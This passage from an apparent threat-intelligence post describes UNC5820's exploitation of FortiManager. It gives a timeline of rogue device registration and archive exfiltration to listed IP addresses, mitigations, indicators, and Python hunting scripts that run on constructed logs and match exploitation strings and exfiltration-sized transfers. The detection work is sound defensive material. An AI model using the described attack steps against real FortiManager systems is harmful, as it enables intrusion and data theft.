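serial are constructed; the indicator values are those quoted on the page."""
import re
from datetime import datetime, timezone

UTC = timezone.utc
KNOWN_BAD_SERIALS = {"FMG-VMTM23017412"}
KNOWN_BAD_IPS = {"45.32.41.202", "195.85.114.78", "104.238.141.143", "158.247.199.37"}

SAMPLE_UNREG = "FMG-VMTM23017412|45.32.41.202\n"
SAMPLE_SUBS = ("SerialNumber=FMG-VMTM23017412|AccountID= 0qsc137p@justdefinition.com"
               "|Company=Purity Supreme|UserID=1756868\n")
# Constructed log lines; the msg= / changes= strings are the ones quoted in Table 3.
SAMPLE_ELOG = """\
date=2024-09-22 time=10:02:21 type=event subtype=dvm user="system" msg="Unregistered device localhost add succeeded"
date=2024-09-22 time=10:07:36 type=event subtype=dvm user="admin" msg="Edit device" changes="Edited device settings (SN FMG-VMTM23017412)"
date=2024-09-22 time=11:00:00 type=event subtype=dvm user="admin" msg="Edit device" changes="Edited device settings (SN FGT60FTK20001234)"
"""
# Constructed (timestamp, kind, detail, bytes) events modelled on the 2024-09-23 rows of Table 2.
SAMPLE_EVENTS = [
    (datetime(2024, 9, 23, 11, 31, 12, tzinfo=UTC), "file", "/tmp/.tm", 1772650),
    (datetime(2024, 9, 23, 11, 31, 19, tzinfo=UTC), "net", "104.238.141.143:443", 1822968),
    (datetime(2024, 9, 23, 11, 40, 0, tzinfo=UTC), "net", "10.0.0.5:443", 512),
]

KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')   # key=value or key="quoted value"
SN_RE = re.compile(r"\(SN ([A-Z0-9-]+)\)")             # serial inside changes="... (SN X)"

def parse_kv_line(line):
    """Turn one key=value log line into a dict, dropping the quotes around values."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}

def parse_unreg_devices(text):
    """[(serial, ip)] records from unreg_devices.txt."""
    return [tuple(row.strip().split("|", 1)) for row in text.splitlines() if "|" in row]

def parse_subs_dat(text):
    """Dict of the '|'-joined KEY=VALUE fields in subs.dat."""
    return {k.strip(): v.strip()
            for k, v in (p.split("=", 1) for p in text.strip().split("|") if "=" in p)}

def epoch_to_utc(epoch):
    """Render an epoch such as the first_tunnel_up value as a UTC timestamp string."""
    return datetime.fromtimestamp(int(epoch), tz=UTC).strftime("%Y-%m-%d %H:%M:%S UTC")

def scan_elog(text, known_serials):
    """Flag Table 3's exploitation strings and any serial outside the managed baseline."""
    hits = []
    for raw in text.splitlines():
        ev = parse_kv_line(raw)
        ts = f"{ev.get('date', '?')} {ev.get('time', '?')}"
        msg = ev.get("msg", "")
        if "Unregistered device" in msg and "add succeeded" in msg:
            hits.append((ts, "unregistered device added"))
        m = SN_RE.search(ev.get("changes", ""))
        if m:
            sn = m.group(1)
            if sn in KNOWN_BAD_SERIALS:
                hits.append((ts, f"known malicious serial {sn}"))
            elif sn not in known_serials:
                hits.append((ts, f"previously unseen serial {sn}"))
    return hits

def check_registration_artifacts(unreg_text, subs_text, known_serials):
    """Findings from the two /fds/data registration files."""
    findings = []
    for serial, ip in parse_unreg_devices(unreg_text):
        if serial in KNOWN_BAD_SERIALS or ip in KNOWN_BAD_IPS:
            findings.append(f"unreg_devices.txt: known-bad registration {serial} from {ip}")
        elif serial not in known_serials:
            findings.append(f"unreg_devices.txt: unknown serial {serial} from {ip}")
    subs = parse_subs_dat(subs_text)
    if subs.get("SerialNumber") in KNOWN_BAD_SERIALS:
        findings.append(f"subs.dat: known-bad serial registered to {subs.get('AccountID')}")
    return findings

def correlate_staging_egress(events, window_s=60, tolerance=0.10):
    """Pair a staging-file write with a following outbound flow that carries the file
    size plus at most `tolerance` more; returns (path, dst, seconds later, extra bytes)."""
    pairs = []
    for fts, kind, path, fsize in events:
        if kind != "file":
            continue
        for nts, nkind, dst, nbytes in events:
            delta = (nts - fts).total_seconds()
            if nkind == "net" and window_s >= delta >= 0 and fsize * (1 + tolerance) >= nbytes >= fsize:
                pairs.append((path, dst, int(delta), nbytes - fsize))
    return pairs

if __name__ == "__main__":
    baseline = {"FGT60FTK20001234"}  # constructed: serials this FortiManager should manage
    print("first_tunnel_up:", epoch_to_utc(1726999303))
    for finding in check_registration_artifacts(SAMPLE_UNREG, SAMPLE_SUBS, baseline):
        print(finding)
    for ts, why in scan_elog(SAMPLE_ELOG, baseline):
        print(f"elog {ts}: {why}")
    for path, dst, secs, extra in correlate_staging_egress(SAMPLE_EVENTS):
        print(f"{path} staged, then {dst} received file size + {extra} bytes {secs}s later")
```

<p><span style="vertical-align: baseline;">Run as-is, the script reports the known-bad registration from the two /fds/data files, the two Table 3 log strings, and the 7-second staging-to-egress pair from Table 2; on a real image, feed it the contents of /fds/data/unreg_devices.txt, /fds/data/subs.dat, /log/locallog/elog, and a list of file and flow events, and seed the baseline from a daily enumeration of the FortiGate devices the FortiManager is meant to manage.</span></p> <p><span style="vertical-align: baseline;">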
</span></p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/fortinet-zero-day-fig6.max-1000x1000.png" alt="Pre-Release Detection Rule - Suspected Zero Day Exploitation of Fortinet Device"> </a> <figcaption class="article-image__caption "><p data-block-key="rgqr5">Figure 6: Pre-Release Detection Rule — Suspected Zero Day Exploitation of Fortinet Device</p></figcaption> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><p><span style="vertical-align: baseline;">In addition to collaborating with Mandiant, Fortinet proactively sent advance communications to </span><span style="vertical-align: baseline;">its customers as an early warning on their advisory to enable customers to strengthen their </span><span style="vertical-align: baseline;">security posture prior to broad public disclosure.</span></p> <h2><span style="vertical-align: baseline;">Timeline of Threat Actor Activity</span></h2></div> <div class="block-paragraph_advanced"><div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; 
width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Timestamp</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Event</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-06-27 12:44:04</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Inbound network connection from 45[.]32[.]41[.]202.<strong> </strong></span><span style="vertical-align: baseline;">File creation: </span><span style="font-style: italic; vertical-align: baseline;">/tmp/.tm</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-06-27 12:44:07</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Outbound network connection to 45[.]32[.]41[.]202 on port 443</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-06-27 12:</span><span style="vertical-align: baseline;">44</span><span style="vertical-align: baseline;">:11</span></p> </td> <td style="vertical-align: middle; border: 1px 
solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Outbound network connection to 195[.]85[.]114[.]78 on port 443. The bytes sent </span><span style="vertical-align: baseline;">are approximately</span><span style="vertical-align: baseline;"> equal to the size of </span><span style="font-style: italic; vertical-align: baseline;">/tmp/.tm</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-09-22 10:01:47</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Inbound network connection from 45[.]32[.]41[.]202</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-09-22 10:01:50</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Outbound network connections to 158[.]247[.]199[.]37:443 and 45[.]32[.]41[.]202:443. 
The connections to 158[.]247[.]199[.]37 were denied</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-09-22 10:02:21</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">String indicating exploitation in </span><span style="font-style: italic; vertical-align: baseline;">/log/locallog/elog</span><span style="font-style: italic; vertical-align: baseline;"><strong> </strong></span><span style="font-style: italic; vertical-align: baseline;">msg="Unregistered device localhost add succeeded"</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-09-22 10:02:55</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">File modified: </span><span style="font-style: italic; vertical-align: baseline;">/fds/data/unreg_devices.txt<strong> </strong></span><span style="vertical-align: baseline;">Contents: “FMG-VMTM23017412|45.32.41.202”</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-09-22 10:07:36</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">String indicating exploitation in </span><span style="font-style: italic; vertical-align: baseline;">/log/locallog/elog</span><span style="font-style: italic; vertical-align: baseline;"><strong> </strong></span><span style="font-style: italic; vertical-align: baseline;">changes="Edited device settings (SN FMG-VMTM23017412)"</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: 
baseline;">2024-09-23 11:31:12</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Inbound network connection to destination port 541 from 45[.]32[.]41[.]202<strong> </strong></span><span style="vertical-align: baseline;">File modified: </span><span style="font-style: italic; vertical-align: baseline;">/tmp/.tm</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">2024-09-23 11:31:16</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Outbound network connection to 104[.]238[.]141[.]143. The bytes sent </span><span style="vertical-align: baseline;">are approximately</span><span style="vertical-align: baseline;"> equal to the size of </span><span style="font-style: italic; vertical-align: baseline;">/tmp/.tm</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <section class="Wy08Ac nRhiJb-qJTHM-OWXEXe-hJDwNd nRhiJb-DbgRPb-II5mzb-cGMI2b"> <div align="left"> <p style="text-align: center;"><span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Table 3: Timeline of activity</span></p> </div> </section> </div></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Mitigation Strategies / Workaround</span></h2> <ol> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Limit access to FortiManager admin portal for only approved internal IP addresses.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Only allow permitted FortiGate 
addresses to communicate with FortiManager.</span></p> </li> <li aria-level="1" style="list-style-type: decimal; vertical-align: baseline;"> <p role="presentation"><span style="vertical-align: baseline;">Deny unknown FortiGate devices from being associated with FortiManager.</span></p> </li> </ol> <p><span style="vertical-align: baseline;">The fgfm-deny-unknown setting shown in Figure 7 is available on FortiManager 7.2.5, 7.0.12, 7.4.3 and later (it is not a functional workaround on 7.6.0).</span></p></div> <div class="block-paragraph_advanced"><pre class="language-plain"><code>config system global
    set fgfm-deny-unknown enable
end</code></pre> <p style="text-align: center;"><span style="vertical-align: baseline; color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;">Figure 7: Configuration to deny unknown devices</span></p></div> <div class="block-paragraph_advanced"><h2><span style="vertical-align: baseline;">Detection</span></h2> <h3><span style="vertical-align: baseline;">YARA-L</span></h3> <p>If you are a Google SecOps Enterprise+ customer, rules were released to the “<a href="https://www.googlecloudcommunity.com/gc/Community-Blog/Google-Security-Operations-Q2-2024-Feature-Roundup/ba-p/785520" rel="noopener nofollow noreferrer" target="_blank">Mandiant Intel Emerging Threats</a>” rule pack (within the <a href="https://cloud.google.com/chronicle/docs/preview/curated-detections/windows-threats-category" rel="noopener nofollow noreferrer" target="_blank">Windows Threats</a> group).</p></div> <div class="block-image_full_width"> <div class="article-module h-c-page"> <div class="h-c-grid"> <figure class="article-image--large h-c-grid__col h-c-grid__col--6 h-c-grid__col--offset-3 " > <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/fortinet-zero-day-fig8.max-1000x1000.png" alt="fortinet-zero-day-fig8"> </a> </figure> </div> </div> </div> <div class="block-paragraph_advanced"><h4><span style="vertical-align: baseline;">Relevant Rules</span></h4> <ul> <li 
role="presentation"><code style="vertical-align: baseline;">Suspicious FortiManager Inbound and Outbound Connection</code></li> <li role="presentation"><code style="vertical-align: baseline;">UNC5820 Fortinet Exploitation and File Download</code></li> <li role="presentation"><code style="vertical-align: baseline;">UNC5820 Fortinet Exploitation and non-HTTPS Command and Control</code></li> <li role="presentation"><code style="vertical-align: baseline;">UNC5820 Fortinet Exploitation and HTTPS Command and Control</code></li> </ul> <h3><span style="vertical-align: baseline;">Other SIEMs</span></h3> <p><span style="vertical-align: baseline;">Develop searches against FortiManager logs for the IOCs listed below. In particular, the malicious Fortinet device ID should provide a high-fidelity alert whenever it appears.</span></p> <p><span style="vertical-align: baseline;">Baseline and set thresholds for unique operations in the FortiManager logs. In particular, “Add device” and “Modify device” operations may be rare enough in your organization to provide an actionable alert until this vulnerability can be patched.</span></p> <p><span style="vertical-align: baseline;">Similarly, baseline and set thresholds for the changes field in the FortiManager logs, and treat entries whose changes field includes the word ‘Unregistered’ with higher sensitivity.</span></p> <p><span style="vertical-align: baseline;">Enumerate the FortiGate devices daily, and alert when a previously unseen device name is observed in the logs.</span></p> <h2><span style="vertical-align: baseline;">Indicators of Compromise (IOCs)</span></h2> <p><span style="vertical-align: baseline;">A </span><a href="https://www.virustotal.com/gui/collection/fee4323cebb88f025586fd9f3e7d0de183fd536fad2312d4ccccdb21f2f7185f/" rel="noopener" target="_blank"><span style="text-decoration: underline; vertical-align: baseline;">Google Threat Intelligence Collection</span></a><span 
style="vertical-align: baseline;"> of IOCs is available for registered users.</span></p></div> <div class="block-paragraph_advanced"><h3><span style="vertical-align: baseline;">Network-Based IOCs</span></h3> <div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; 
width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"><table border="1px" cellpadding="16px" style="border-collapse: collapse; margin-left: auto; margin-right: auto;"><colgroup><col/><col/></colgroup> <tbody> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">IOC</strong></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><strong style="vertical-align: baseline;">Description</strong></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">45.32.41.202</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC5820</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; 
padding: 16px;"> <p><span style="vertical-align: baseline;">104.238.141.143</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC5820</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">158.247.199.37</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC5820</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">195.85.114.78</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">UNC5820</span></p> </td> </tr> </tbody> </table></div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> </div> <h3><span style="vertical-align: baseline;">Host-Based IOCs</span></h3> <div align="left"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; 
overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> <div style="color: #5f6368; overflow-x: auto; overflow-y: hidden; width: 100%;"> 
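<p>The "Other SIEMs" guidance above and the timeline in Table 3 as one runnable hunt: exact matches on the exploitation strings and the malicious device ID, a threshold on rare operations against a daily baseline, a check on the changes field, an alert on device names absent from the last enumeration, and the port 541 inbound / sized outbound flow pattern. This is an added example, not code from the original post or from Mandiant. The log lines and flow records are constructed: only the quoted strings, the serial FMG-VMTM23017412, the four IOC addresses and port 541 come from the post; the field names (operation=, device=, changes=, msg=), the internal addresses, the archive size and the thresholds are assumptions.</p>

```python
"""Hunt for the UNC5820 / CVE-2024-47575 indicators in FortiManager logs.

Added example; constructed data. Only the exploit strings, device serial,
IOC addresses and port 541 are from the post. The elog field layout
(operation=, device=, changes=, msg=), internal addresses, /tmp/.tm size
and baseline figures are ASSUMED for the demo.
"""
import re
from collections import Counter
from typing import Dict, Iterable, List, Set, Tuple

# --- indicators taken from the post -----------------------------------------
UNC5820_IPS: Set[str] = {"45.32.41.202", "104.238.141.143", "158.247.199.37", "195.85.114.78"}
MALICIOUS_DEVICE_SN = "FMG-VMTM23017412"
EXPLOIT_STRINGS: Tuple[str, ...] = (
    'msg="Unregistered device localhost add succeeded"',
    'changes="Edited device settings (SN FMG-VMTM23017412)"',
    'changes="Added unregistered device to unregistered table."',
)
RARE_OPERATIONS = {"Add device", "Modify device"}
FGFM_PORT = 541  # FortiGate-to-FortiManager protocol port, inbound in Table 3

# --- constructed sample data (assumed layout) -------------------------------
KNOWN_DEVICES: Set[str] = {"FGT-BRANCH-01", "FGT-BRANCH-02"}  # yesterday's enumeration
ALLOWED_FORTIGATES: Set[str] = {"10.1.1.20"}                  # permitted FGFM peers
BASELINE_DAILY = {"Login": 40.0, "Modify device": 0.2, "Add device": 0.0}
TM_SIZE = 1_048_576                                           # assumed size of /tmp/.tm
SAMPLE_ELOG = """\
date=2024-09-22 time=09:12:01 user=admin operation="Login" device=FGT-BRANCH-01 msg="Login succeeded"
date=2024-09-23 time=11:31:10 user=system operation="Add device" device=localhost msg="Unregistered device localhost add succeeded"
date=2024-09-23 time=11:31:11 user=system operation="Modify device" device=localhost changes="Added unregistered device to unregistered table."
date=2024-09-23 time=11:31:12 user=admin operation="Modify device" device=FMG-VMTM23017412 changes="Edited device settings (SN FMG-VMTM23017412)"
date=2024-09-23 time=11:31:14 user=system operation="Modify device" device=FGT-BRANCH-02 changes="Unregistered device table cleaned"
date=2024-09-23 time=11:32:00 user=admin operation="Login" device=FGT-BRANCH-01 msg="Login succeeded"
"""
SAMPLE_FLOWS = [  # direction is relative to the FortiManager at 10.0.0.5
    {"direction": "in", "src": "10.1.1.20", "dst": "10.0.0.5", "dport": 541, "bytes": 2048},
    {"direction": "in", "src": "45.32.41.202", "dst": "10.0.0.5", "dport": 541, "bytes": 4096},
    {"direction": "out", "src": "10.0.0.5", "dst": "104.238.141.143", "dport": 443, "bytes": 1_048_900},
    {"direction": "out", "src": "10.0.0.5", "dst": "10.0.0.9", "dport": 514, "bytes": 300},
]

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')  # key=value, value optionally double-quoted


def parse_kv(line: str) -> Dict[str, str]:
    """Split a key=value log line into a dict, dropping surrounding quotes."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def scan_elog(lines: Iterable[str], known_devices: Set[str]) -> List[Tuple[str, str]]:
    """Return (category, evidence) pairs; one primary category per line, plus
    rare-operation and unseen-device findings that stand on their own."""
    findings: List[Tuple[str, str]] = []
    new_devices: Set[str] = set()
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        rec = parse_kv(line)
        # 1. exact strings the post ties to exploitation (highest fidelity)
        primary = next((("exploit_string", s) for s in EXPLOIT_STRINGS if s in line), None)
        # 2. the attacker's device serial anywhere else in the record
        if primary is None and MALICIOUS_DEVICE_SN in line:
            primary = ("malicious_sn", line)
        # 3. 'Unregistered' in the changes field (lower fidelity, higher sensitivity)
        if primary is None and "Unregistered" in rec.get("changes", ""):
            primary = ("unregistered", rec["changes"])
        if primary is not None:
            findings.append(primary)
        # 4. operations that should be rare enough to alert on outright
        if rec.get("operation") in RARE_OPERATIONS:
            findings.append(("rare_operation", rec["operation"]))
        # 5. a device name missing from the last enumeration (reported once)
        dev = rec.get("device")
        if dev and dev not in known_devices and dev not in new_devices:
            new_devices.add(dev)
            findings.append(("unseen_device", dev))
    return findings


def operation_counts(lines: Iterable[str]) -> Counter:
    """Count operation= values for one day; the input to a baseline."""
    return Counter(op for op in (parse_kv(l).get("operation") for l in lines) if op)


def threshold_alerts(today: Counter, baseline: Dict[str, float], factor: float = 3.0) -> Dict[str, int]:
    """Operations whose count today exceeds factor x their baseline daily average."""
    return {op: n for op, n in today.items() if n > factor * baseline.get(op, 0.0)}


def scan_flows(flows, allowed_fortigates: Set[str], tm_size: int, slack: int = 512) -> List[Tuple[str, str]]:
    """Flag IOC peers, FGFM connections from non-permitted addresses, and outbound
    transfers within `slack` bytes of the /tmp/.tm archive (the Table 3 pattern)."""
    alerts: List[Tuple[str, str]] = []
    for f in flows:
        peer = f["src"] if f["direction"] == "in" else f["dst"]
        if peer in UNC5820_IPS:
            alerts.append(("ioc_ip", peer))
        if f["direction"] == "in" and f["dport"] == FGFM_PORT and peer not in allowed_fortigates:
            alerts.append(("fgfm_from_unknown", peer))
        if f["direction"] == "out" and abs(f["bytes"] - tm_size) <= slack:
            alerts.append(("possible_tm_exfil", peer))
    return alerts


def summarize(findings: Iterable[Tuple[str, str]]) -> Dict[str, int]:
    """Count findings per category."""
    return dict(Counter(cat for cat, _ in findings))


def hunt_sample() -> Dict[str, object]:
    """Run all three checks over the constructed sample data."""
    lines = SAMPLE_ELOG.splitlines()
    return {
        "elog": scan_elog(lines, KNOWN_DEVICES),
        "thresholds": threshold_alerts(operation_counts(lines), BASELINE_DAILY),
        "flows": scan_flows(SAMPLE_FLOWS, ALLOWED_FORTIGATES, TM_SIZE),
    }


if __name__ == "__main__":
    for key, value in hunt_sample().items():
        print(f"{key}: {value}")
```

<p>On the sample data the three exploitation strings and the "Unregistered" change fire on the four records from 11:31, every "Add device" / "Modify device" exceeds its (assumed) baseline, "localhost" and the attacker's serial are reported as never-enumerated device names, and both Table 3 connections are caught twice: once as IOC addresses and once as an FGFM session from a non-permitted peer and an outbound transfer sized like the archive. Tune <code>BASELINE_DAILY</code>, <code>factor</code> and <code>slack</code> to your own environment; the exact-string and serial matches need no tuning.</p>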
